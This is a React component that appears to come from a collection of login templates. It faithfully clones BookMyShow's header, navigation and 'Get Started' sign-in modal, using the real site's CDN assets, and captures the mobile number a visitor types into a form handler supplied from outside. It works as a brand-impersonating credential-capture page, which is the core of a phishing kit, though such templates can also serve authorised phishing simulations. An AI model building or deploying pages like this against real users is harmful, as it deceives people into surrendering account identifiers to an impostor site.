import React from 'react';
import { Button } from '@/components/ui/button';
import { Input } from '@/components/ui/input';
import { X } from 'lucide-react';
import { LoginTemplate } from '@/lib/loginTemplates/types';

interface BookMyShowTemplateProps {
  template: LoginTemplate;
  username: string;
  setUsername: (value: string) => void;
  password: string;
  setPassword: (value: string) => void;
  phoneNumber: string;
  setPhoneNumber: (value: string) => void;
  handleSubmit: (e: React.FormEvent) => void;
  isLoading: boolean;
  showPhoneField: boolean;
  navigateToSignup: (id: string) => void;
}

const BookMyShowTemplate: React.FC<BookMyShowTemplateProps> = ({
  template,
  username,
  setUsername,
  handleSubmit,
  isLoading,
  navigateToSignup,
}) => {
  return (
    <div className="flex flex-col min-h-screen bg-[#1a1a1a]">
      {/* Header */}
      <header className="bg-[#333545] py-2 px-4 flex items-center justify-between fixed top-0 left-0 right-0 z-50">
        <div className="flex items-center gap-4">
          <img 
            src={template.logoUrl} 
            alt="BookMyShow" 
            className="h-9"
          />
          <div className="relative">
            <input
              type="text"
              placeholder="Search for Movies, Events, Plays, Sports and Activities"
              className="w-[500px] h-9 rounded bg-white px-4 text-sm text-gray-700 placeholder:text-gray-500"
            />
            <button className="absolute right-3 top-1/2 -translate-y-1/2">
              <svg className="w-4 h-4 text-gray-500" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0z" />
              </svg>
            </button>
          </div>
        </div>
        
        <div className="flex items-center gap-4">
          <div className="flex items-center text-white">
            <span>Delhi-NCR</span>
            <svg className="w-4 h-4 ml-1" fill="none" stroke="currentColor" viewBox="0 0 24 24">
              <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M19 9l-7 7-7-7" />
            </svg>
          </div>
          <Button className="bg-[#F84464] hover:bg-[#F84464]/90 text-white rounded h-9">
            Sign in
          </Button>
          <button className="text-white">
            <svg className="w-6 h-6" fill="none" stroke="currentColor" viewBox="0 0 24 24">
              <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M4 6h16M4 12h16M4 18h16" />
            </svg>
          </button>
        </div>
      </header>

      {/* Navigation */}
      <nav className="bg-[#222539] py-2 px-4 mt-[52px] flex items-center justify-between fixed w-full z-40">
        <div className="flex items-center gap-8 text-[#CCCCCC] text-sm">
          <a href="#" className="hover:text-white">Movies</a>
          <a href="#" className="hover:text-white">Stream</a>
          <a href="#" className="hover:text-white">Events</a>
          <a href="#" className="hover:text-white">Plays</a>
          <a href="#" className="hover:text-white">Sports</a>
          <a href="#" className="hover:text-white">Activities</a>
        </div>
        
        <div className="flex items-center gap-8 text-[#CCCCCC] text-sm">
          <a href="#" className="hover:text-white">ListYourShow</a>
          <a href="#" className="hover:text-white">Corporates</a>
          <a href="#" className="hover:text-white">Offers</a>
          <a href="#" className="hover:text-white">Gift Cards</a>
        </div>
      </nav>

      {/* Login Modal */}
      <div className="fixed inset-0 bg-black/50 flex items-center justify-center z-50 p-4">
        <div className="bg-white rounded-lg w-full max-w-[400px] relative">
          <button 
            onClick={() => navigateToSignup(template.id)}
            className="absolute right-4 top-4"
          >
            <X className="h-6 w-6 text-gray-500" />
          </button>

          <div className="p-8">
            <h2 className="text-[22px] font-medium mb-6">Get Started</h2>

            <div className="space-y-4">
              <button className="w-full h-11 border rounded flex items-center justify-center gap-2 hover:bg-gray-50">
                <img src="https://in.bmscdn.com/webin/common/icons/googlelogo.svg" alt="Google" className="w-5 h-5" />
                Continue with Google
              </button>

              <button className="w-full h-11 border rounded flex items-center justify-center gap-2 hover:bg-gray-50">
                <svg className="w-5 h-5" viewBox="0 0 24 24" fill="currentColor">
                  <path d="M20 4H4c-1.1 0-1.99.9-1.99 2L2 18c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V6c0-1.1-.9-2-2-2zm0 4l-8 5-8-5V6l8 5 8-5v2z"/>
                </svg>
                Continue with Email
              </button>

              <button className="w-full h-11 border rounded flex items-center justify-center gap-2 hover:bg-gray-50">
                <svg className="w-5 h-5" viewBox="0 0 24 24" fill="currentColor">
                  <path d="M18.71 19.5c-.83 1.24-1.71 2.45-3.05 2.47-1.34.03-1.77-.79-3.29-.79-1.53 0-2 .77-3.27.82-1.31.05-2.3-1.32-3.14-2.53C4.25 17 2.94 12.45 4.7 9.39c.87-1.52 2.43-2.48 4.12-2.51 1.28-.02 2.5.87 3.29.87.78 0 2.26-1.07 3.81-.91.65.03 2.47.26 3.64 1.98-.09.06-2.17 1.28-2.15 3.81.03 3.02 2.65 4.03 2.68 4.04-.03.07-.42 1.44-1.38 2.83M13 3.5c.73-.83 1.94-1.46 2.94-1.5.13 1.17-.34 2.35-1.04 3.19-.69.85-1.83 1.51-2.95 1.42-.15-1.15.41-2.35 1.05-3.11z"/>
                </svg>
                Continue with Apple
              </button>

              <div className="relative">
                <div className="absolute inset-0 flex items-center">
                  <div className="w-full border-t border-gray-300"></div>
                </div>
                <div className="relative flex justify-center text-sm">
                  <span className="px-2 bg-white text-gray-500">OR</span>
                </div>
              </div>

              <form onSubmit={handleSubmit} className="space-y-4">
                <div className="flex">
                  <span className="inline-flex items-center px-3 rounded-l border border-r-0 border-gray-300 bg-gray-50 text-gray-500 text-sm">
                    +91
                  </span>
                  <Input
                    type="tel"
                    value={username}
                    onChange={(e) => setUsername(e.target.value)}
                    placeholder="Continue with mobile number"
                    className="rounded-l-none"
                    required
                  />
                </div>
              </form>
            </div>

            <p className="text-xs text-gray-500 mt-6">
              I agree to the{' '}
              <a href="#" className="text-[#F84464]">Terms & Conditions</a>
              {' '}& {' '}
              <a href="#" className="text-[#F84464]">Privacy Policy</a>
            </p>
          </div>
        </div>
      </div>
    </div>
  );
};

export default BookMyShowTemplate;